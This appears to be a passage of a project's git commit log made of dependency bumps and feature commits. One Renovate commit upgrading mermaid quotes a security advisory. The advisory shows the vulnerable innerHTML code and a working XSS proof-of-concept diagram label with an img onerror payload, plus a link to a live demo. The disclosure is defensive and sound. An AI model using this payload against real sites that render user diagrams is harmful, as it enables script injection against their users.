Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/toeverything/AFFiNE/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-09-07 00:17:51 +08:00
renovate[bot] 18faaa38a0 chore: bump up mermaid version to v10.9.4 [SECURITY] (#13518)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [mermaid](https://redirect.github.com/mermaid-js/mermaid) | [`10.9.3`
-> `10.9.4`](https://renovatebot.com/diffs/npm/mermaid/10.9.3/10.9.4) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/mermaid/10.9.4?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/mermaid/10.9.3/10.9.4?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-54881](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-7rqq-prvp-x9jh)

### Summary
In the default configuration of mermaid 11.9.0, user supplied input for
sequence diagram labels is passed to `innerHTML` during calculation of
element size, causing XSS.

### Details
Sequence diagram node labels with KaTeX delimiters are passed through
`calculateMathMLDimensions`. This method passes the full label to
`innerHTML` which allows allows malicious users to inject arbitrary HTML
and cause XSS when mermaid-js is used in it's default configuration
(with KaTeX support enabled).

The vulnerability lies here:

```ts
export const calculateMathMLDimensions = async (text: string, config: MermaidConfig) => {
  text = await renderKatex(text, config);
  const divElem = document.createElement('div');
  divElem.innerHTML = text; // XSS sink, text has not been sanitized.
  divElem.id = 'katex-temp';
  divElem.style.visibility = 'hidden';
  divElem.style.position = 'absolute';
  divElem.style.top = '0';
  const body = document.querySelector('body');
  body?.insertAdjacentElement('beforeend', divElem);
  const dim = { width: divElem.clientWidth, height: divElem.clientHeight };
  divElem.remove();
  return dim;
};
```

The `calculateMathMLDimensions` method was introduced in
5c69e5fdb004a6d0a2abe97e23d26e223a059832 two years ago, which was
released in [Mermaid
10.9.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.0).

### PoC
Render the following diagram and observe the modified DOM.

```
sequenceDiagram
    participant A as Alice<img src="x" onerror="document.write(`xss on ${document.domain}`)">$$\\text{Alice}$$
    A->>John: Hello John, how are you?
    Alice-)John: See you later!
```

Here is a PoC on mermaid.live:
https://mermaid.live/edit#pako:eNpVUMtOwzAQ_BWzyoFKaRTyaFILiio4IK7ckA-1km1iKbaLY6spUf4dJ0AF68uOZ2dm7REqXSNQ6PHDoarwWfDGcMkUudaJGysqceLKkj3hPdl3osJ7IRvSm-qBwcCAaIXGaONRrSsnUdnobITF28PQ954lwXglai25UNNhxWAXBMyXxcGOi-3kL_5k79e73atuFSUv2HWazH1IWn0m3CC5aPf4b3p2WK--BW-4DJCOWzQ3TM0HQmiMqIFa4zAEicZv4iGMsw0D26JEBtS3NR656ywDpiYv869_11r-Ko12TQv0yLveI3eqfcjP111HUNVonrRTFuhdsVgAHWEAmuRxlG7SuEzKMi-yJAnhAjTLIk_EcbFJtuk2y9MphM8lM47KIp--AOZghtU

### Impact
XSS on all sites that use mermaid and render user supplied diagrams
without further sanitization.

### Remediation
The value of the `text` argument for the `calculateMathMLDimensions`
method needs to be sanitized before getting passed on to `innerHTML`.

---

### Release Notes

<details>
<summary>mermaid-js/mermaid (mermaid)</summary>

###
[`v10.9.4`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.4)

[Compare
Source](https://redirect.github.com/mermaid-js/mermaid/compare/v10.9.3...v10.9.4)

This release backports the fix for GHSA-7rqq-prvp-x9jh from
[v11.10.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.10.0),
preventing a potential XSS attack in labels in sequence diagrams.

See:
[`9d68517`](https://redirect.github.com/mermaid-js/mermaid/commit/9d685178d215f76be4d5e8fe47c64dd915274738)
(on `main` branch)
See:
[`7509b06`](https://redirect.github.com/mermaid-js/mermaid/commit/7509b066f164353c26028d5dd366736bed52d0c7)
(backported commit)

**Full Changelog**:
<https://github.com/mermaid-js/mermaid/compare/v10.9.3...v10.9.4>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS44MS4yIiwidXBkYXRlZEluVmVyIjoiNDEuODIuNyIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-08-25 14:37:24 +08:00
DarkSky 072557eba1 feat(server): adapt gpt5 (#13478)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

- New Features
- Added GPT-5 family and made GPT-5/-mini the new defaults for Copilot
scenarios and prompts.

- Bug Fixes
- Improved streaming chunk formats and reasoning/text semantics,
consistent attachment mediaType handling, and more reliable reranking
via log-prob handling.

- Refactor
- Unified maxOutputTokens usage; removed per-call step caps and migrated
several tools to a unified inputSchema shape.

- Chores
- Upgraded AI SDK dependencies and bumped an internal dependency
version.

- Tests
- Updated mocks and tests to reference GPT-5 variants and new stream
formats.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-08-13 02:32:15 +00:00
Jachin 678dc15365 feat(editor): add mermaid code preview (#13456)
<img width="971" height="681" alt="iShot_2025-08-10_14 29 01"
src="https://github.com/user-attachments/assets/eff3e6d5-3129-42ac-aceb-994c18f675ab"
/>


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Mermaid diagram previews for code blocks with interactive zoom, pan,
and reset controls.
* Improved rendering feedback with loading, error states, retry
behavior, and fallback messaging.

* **Chores**
  * Added Mermaid as a frontend dependency to enable diagram rendering.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: L-Sun <zover.v@gmail.com>
2025-08-12 03:00:01 +00:00
fengmk2 07b9b4fb8d chore: use latest oxlint version (#13457)
oxlint-tsgolint install fails had been fixed

see https://github.com/oxc-project/oxc/issues/12892



#### PR Dependency Tree


* **PR #13457** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Updated the version range for a development dependency to allow for
newer compatible releases.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-08-11 03:09:39 +00:00
EYHN 52a9c86219 feat(core): enable battery save mode for mobile (#13441)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Battery save mode is now enabled by default on mobile devices.
* Users will see an updated, more detailed description for battery save
mode.
* Battery save mode can now be configured by all users, not just in
certain builds.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-08-08 02:32:38 +00:00
Peng Xiao d2a73b6d4e fix(electron): disable runAsNode fuse (#13406)
fix AF-2781




#### PR Dependency Tree


* **PR #13406** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Updated Electron app configuration to include an additional plugin for
enhanced packaging options.
* Added a new development dependency to support the updated
configuration.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-08-04 13:38:12 +00:00
forehalo 37e859484d fix: bump on-headers 2025-08-01 17:33:13 +08:00
DarkSky 5cbcf6f907 feat(server): add fallback model and baseurl in schema (#13375)
fix AI-398

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Added support for specifying fallback models for multiple AI
providers, enhancing reliability when primary models are unavailable.
* Providers can now fetch and update their list of available models
dynamically from external APIs.
* Configuration options expanded to allow custom base URLs for certain
providers.

* **Bug Fixes**
* Improved model selection logic to use fallback models if the requested
model is not available online.

* **Chores**
* Updated backend dependencies to include authentication support for
Google services.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-08-01 07:22:48 +00:00
德布劳外 · 贾贵 77950cfc1b feat(core): extract md & snapshot & attachments from selected (#13312)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

## Summary by CodeRabbit

* **New Features**
* Enhanced extraction of selected content in the editor to include
document snapshots, markdown summaries, and attachments for both
edgeless and page modes.
* Attachments related to selected content are now available in chat and
input contexts, providing additional metadata.
* Added utility to identify and retrieve selected attachments in editor
content.

* **Bug Fixes**
* Improved consistency in attachment retrieval when extracting selected
content.

* **Chores**
* Updated dependencies and workspace references to include new block
suite components.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

> CLOSE AF-2770
2025-07-31 09:53:09 +00:00
Yii 8d889fc3c7 feat(server): basic mcp server (#13298)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Introduced a new endpoint for MCP (Model Context Protocol) server
interaction under `/api/workspaces/:workspaceId/mcp`, enabling advanced
document reading and search capabilities within workspaces.
* Added support for semantic and keyword search tools, as well as
document reading through the MCP server, with user access control and
input validation.

* **Improvements**
* Enhanced metadata handling in semantic search results for improved
clarity.
* Streamlined internal imports and refactored utility functions for
better maintainability.

* **Chores**
  * Added a new SDK dependency to the backend server package.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-07-31 06:12:50 +00:00
dependabot[bot] bd161c54b2 chore: bump form-data from 4.0.2 to 4.0.4 (#13342)
Bumps [form-data](https://github.com/form-data/form-data) from 4.0.2 to
4.0.4.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/form-data/form-data/releases">form-data's
releases</a>.</em></p>
<blockquote>
<h2>v4.0.4</h2>
<h2><a
href="https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4">v4.0.4</a>
- 2025-07-16</h2>
<h3>Commits</h3>
<ul>
<li>[meta] add <code>auto-changelog</code> <a
href="https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479"><code>811f682</code></a></li>
<li>[Tests] handle predict-v8-randomness failures in node &lt; 17 and
node &gt; 23 <a
href="https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402"><code>1d11a76</code></a></li>
<li>[Fix] Switch to using <code>crypto</code> random for boundary values
<a
href="https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0"><code>3d17230</code></a></li>
<li>[Tests] fix linting errors <a
href="https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a"><code>5e34080</code></a></li>
<li>[meta] actually ensure the readme backup isn’t published <a
href="https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef"><code>316c82b</code></a></li>
<li>[Dev Deps] update <code>@ljharb/eslint-config</code> <a
href="https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d"><code>58c25d7</code></a></li>
<li>[meta] fix readme capitalization <a
href="https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61"><code>2300ca1</code></a></li>
</ul>
<h2>v4.0.3</h2>
<h2><a
href="https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3">v4.0.3</a>
- 2025-06-05</h2>
<h3>Fixed</h3>
<ul>
<li>[Fix] <code>append</code>: avoid a crash on nullish values <a
href="https://redirect.github.com/form-data/form-data/issues/577"><code>[#577](https://github.com/form-data/form-data/issues/577)</code></a></li>
</ul>
<h3>Commits</h3>
<ul>
<li>[eslint] use a shared config <a
href="https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f"><code>426ba9a</code></a></li>
<li>[eslint] fix some spacing issues <a
href="https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939"><code>2094191</code></a></li>
<li>[Refactor] use <code>hasown</code> <a
href="https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa"><code>81ab41b</code></a></li>
<li>[Fix] validate boundary type in <code>setBoundary()</code> method <a
href="https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e"><code>8d8e469</code></a></li>
<li>[Tests] add tests to check the behavior of <code>getBoundary</code>
with non-strings <a
href="https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995"><code>837b8a1</code></a></li>
<li>[Dev Deps] remove unused deps <a
href="https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e"><code>870e4e6</code></a></li>
<li>[meta] remove local commit hooks <a
href="https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e"><code>e6e83cc</code></a></li>
<li>[Dev Deps] update <code>eslint</code> <a
href="https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916"><code>4066fd6</code></a></li>
<li>[meta] fix scripts to use prepublishOnly <a
href="https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75"><code>c4bbb13</code></a></li>
</ul>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/form-data/form-data/blob/master/CHANGELOG.md">form-data's
changelog</a>.</em></p>
<blockquote>
<h2><a
href="https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4">v4.0.4</a>
- 2025-07-16</h2>
<h3>Commits</h3>
<ul>
<li>[meta] add <code>auto-changelog</code> <a
href="https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479"><code>811f682</code></a></li>
<li>[Tests] handle predict-v8-randomness failures in node &lt; 17 and
node &gt; 23 <a
href="https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402"><code>1d11a76</code></a></li>
<li>[Fix] Switch to using <code>crypto</code> random for boundary values
<a
href="https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0"><code>3d17230</code></a></li>
<li>[Tests] fix linting errors <a
href="https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a"><code>5e34080</code></a></li>
<li>[meta] actually ensure the readme backup isn’t published <a
href="https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef"><code>316c82b</code></a></li>
<li>[Dev Deps] update <code>@ljharb/eslint-config</code> <a
href="https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d"><code>58c25d7</code></a></li>
<li>[meta] fix readme capitalization <a
href="https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61"><code>2300ca1</code></a></li>
</ul>
<h2><a
href="https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3">v4.0.3</a>
- 2025-06-05</h2>
<h3>Fixed</h3>
<ul>
<li>[Fix] <code>append</code>: avoid a crash on nullish values <a
href="https://redirect.github.com/form-data/form-data/issues/577"><code>[#577](https://github.com/form-data/form-data/issues/577)</code></a></li>
</ul>
<h3>Commits</h3>
<ul>
<li>[eslint] use a shared config <a
href="https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f"><code>426ba9a</code></a></li>
<li>[eslint] fix some spacing issues <a
href="https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939"><code>2094191</code></a></li>
<li>[Refactor] use <code>hasown</code> <a
href="https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa"><code>81ab41b</code></a></li>
<li>[Fix] validate boundary type in <code>setBoundary()</code> method <a
href="https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e"><code>8d8e469</code></a></li>
<li>[Tests] add tests to check the behavior of <code>getBoundary</code>
with non-strings <a
href="https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995"><code>837b8a1</code></a></li>
<li>[Dev Deps] remove unused deps <a
href="https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e"><code>870e4e6</code></a></li>
<li>[meta] remove local commit hooks <a
href="https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e"><code>e6e83cc</code></a></li>
<li>[Dev Deps] update <code>eslint</code> <a
href="https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916"><code>4066fd6</code></a></li>
<li>[meta] fix scripts to use prepublishOnly <a
href="https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75"><code>c4bbb13</code></a></li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad"><code>41996f5</code></a>
v4.0.4</li>
<li><a
href="https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef"><code>316c82b</code></a>
[meta] actually ensure the readme backup isn’t published</li>
<li><a
href="https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61"><code>2300ca1</code></a>
[meta] fix readme capitalization</li>
<li><a
href="https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479"><code>811f682</code></a>
[meta] add <code>auto-changelog</code></li>
<li><a
href="https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a"><code>5e34080</code></a>
[Tests] fix linting errors</li>
<li><a
href="https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402"><code>1d11a76</code></a>
[Tests] handle predict-v8-randomness failures in node &lt; 17 and node
&gt; 23</li>
<li><a
href="https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d"><code>58c25d7</code></a>
[Dev Deps] update <code>@ljharb/eslint-config</code></li>
<li><a
href="https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0"><code>3d17230</code></a>
[Fix] Switch to using <code>crypto</code> random for boundary
values</li>
<li><a
href="https://github.com/form-data/form-data/commit/d8d67dc8ac79285154edf7d3f57dbab593b9a146"><code>d8d67dc</code></a>
v4.0.3</li>
<li><a
href="https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e"><code>e6e83cc</code></a>
[meta] remove local commit hooks</li>
<li>Additional commits viewable in <a
href="https://github.com/form-data/form-data/compare/v4.0.2...v4.0.4">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=form-data&package-manager=npm_and_yarn&previous-version=4.0.2&new-version=4.0.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/toeverything/AFFiNE/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-07-29 09:52:46 +08:00
renovate[bot] ff9a4f4322 chore: bump up nestjs (#13288)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
|
[@nestjs-cls/transactional-adapter-prisma](https://papooch.github.io/nestjs-cls/)
([source](https://redirect.github.com/Papooch/nestjs-cls)) | [`1.2.24`
->
`1.3.0`](https://renovatebot.com/diffs/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.2.24/1.3.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.3.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.2.24/1.3.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.3` ->
`11.1.5`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.3/11.1.5)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.3/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.3` ->
`11.1.5`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.3/11.1.5)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.3/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.3` ->
`11.1.5`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.3/11.1.5)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.3/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.3` ->
`11.1.5`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.3/11.1.5)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.3/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.3` ->
`11.1.5`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.3/11.1.5)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.3/11.1.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

---

### Release Notes

<details>
<summary>Papooch/nestjs-cls
(@&#8203;nestjs-cls/transactional-adapter-prisma)</summary>

###
[`v1.3.0`](https://redirect.github.com/Papooch/nestjs-cls/releases/tag/%40nestjs-cls/transactional-adapter-prisma%401.3.0)

[Compare
Source](https://redirect.github.com/Papooch/nestjs-cls/compare/@nestjs-cls/transactional-adapter-prisma@1.2.24...@nestjs-cls/transactional-adapter-prisma@1.3.0)

##### Features

- **transactional-adapter-prisma**: add support for nested transactions
([c49c766](https://redirect.github.com/Papooch/nestjs-cls/commits/c49c766))
- **transactional-adapter-prisma**: add support for nested transactions
([#&#8203;353](https://redirect.github.com/Papooch/nestjs-cls/issues/353))
([c49c766](https://redirect.github.com/Papooch/nestjs-cls/commits/c49c766))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.5`](https://redirect.github.com/nestjs/nest/compare/v11.1.4...9bb0560e79743cc0bd2ce198c65e21332200c3ad)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.4...v11.1.5)

###
[`v11.1.4`](https://redirect.github.com/nestjs/nest/compare/v11.1.3...1f101ac8b0a5bb5b97a7caf6634fcea8d65196e0)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.3...v11.1.4)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/core)</summary>

###
[`v11.1.5`](https://redirect.github.com/nestjs/nest/compare/v11.1.4...9bb0560e79743cc0bd2ce198c65e21332200c3ad)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.4...v11.1.5)

###
[`v11.1.4`](https://redirect.github.com/nestjs/nest/compare/v11.1.3...1f101ac8b0a5bb5b97a7caf6634fcea8d65196e0)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.3...v11.1.4)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-express)</summary>

###
[`v11.1.5`](https://redirect.github.com/nestjs/nest/compare/v11.1.4...9bb0560e79743cc0bd2ce198c65e21332200c3ad)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.4...v11.1.5)

###
[`v11.1.4`](https://redirect.github.com/nestjs/nest/compare/v11.1.3...1f101ac8b0a5bb5b97a7caf6634fcea8d65196e0)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.3...v11.1.4)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-socket.io)</summary>

###
[`v11.1.5`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.5)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.4...v11.1.5)

#### v11.1.5 (2025-07-18)

##### Dependencies

- `platform-express`
- [#&#8203;15425](https://redirect.github.com/nestjs/nest/pull/15425)
chore(deps): bump multer from 2.0.1 to 2.0.2 in
/packages/platform-express
([@&#8203;dependabot\[bot\]](https://redirect.github.com/apps/dependabot))

###
[`v11.1.4`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.4)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.3...v11.1.4)

##### v11.1.4 (2025-07-16)

##### Bug fixes

- `platform-fastify`
- [#&#8203;15385](https://redirect.github.com/nestjs/nest/pull/15385)
fix(testing): auto-init fastify adapter for middleware registration
([@&#8203;mag123c](https://redirect.github.com/mag123c))
- `core`, `testing`
- [#&#8203;15405](https://redirect.github.com/nestjs/nest/pull/15405)
fix(core): fix race condition in class dependency resolution
([@&#8203;hajekjiri](https://redirect.github.com/hajekjiri))
- `core`
- [#&#8203;15333](https://redirect.github.com/nestjs/nest/pull/15333)
fix(core): Make flattenRoutePath return a valid module
([@&#8203;gentunian](https://redirect.github.com/gentunian))
- `microservices`
- [#&#8203;15305](https://redirect.github.com/nestjs/nest/pull/15305)
fix(microservices): Revisit RMQ pattern matching with wildcards
([@&#8203;getlarge](https://redirect.github.com/getlarge))
- [#&#8203;15250](https://redirect.github.com/nestjs/nest/pull/15250)
fix(constants): update RMQ\_DEFAULT\_QUEUE to an empty string
([@&#8203;EeeasyCode](https://redirect.github.com/EeeasyCode))

##### Enhancements

- `platform-fastify`
- [#&#8203;14789](https://redirect.github.com/nestjs/nest/pull/14789)
feat(fastify): add decorator for custom schema
([@&#8203;piotrfrankowski](https://redirect.github.com/piotrfrankowski))
- `common`, `core`, `microservices`, `platform-express`,
`platform-fastify`, `websockets`
- [#&#8203;15386](https://redirect.github.com/nestjs/nest/pull/15386)
feat: enhance introspection capabilities
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- `core`
- [#&#8203;15374](https://redirect.github.com/nestjs/nest/pull/15374)
feat: supporting fine async storage control
([@&#8203;Farenheith](https://redirect.github.com/Farenheith))

##### Dependencies

- `platform-ws`
- [#&#8203;15350](https://redirect.github.com/nestjs/nest/pull/15350)
chore(deps): bump ws from 8.18.2 to 8.18.3
([@&#8203;dependabot\[bot\]](https://redirect.github.com/apps/dependabot))
- `platform-fastify`
- [#&#8203;15278](https://redirect.github.com/nestjs/nest/pull/15278)
chore(deps): bump fastify from 5.3.3 to 5.4.0
([@&#8203;dependabot\[bot\]](https://redirect.github.com/apps/dependabot))

##### Committers: 11

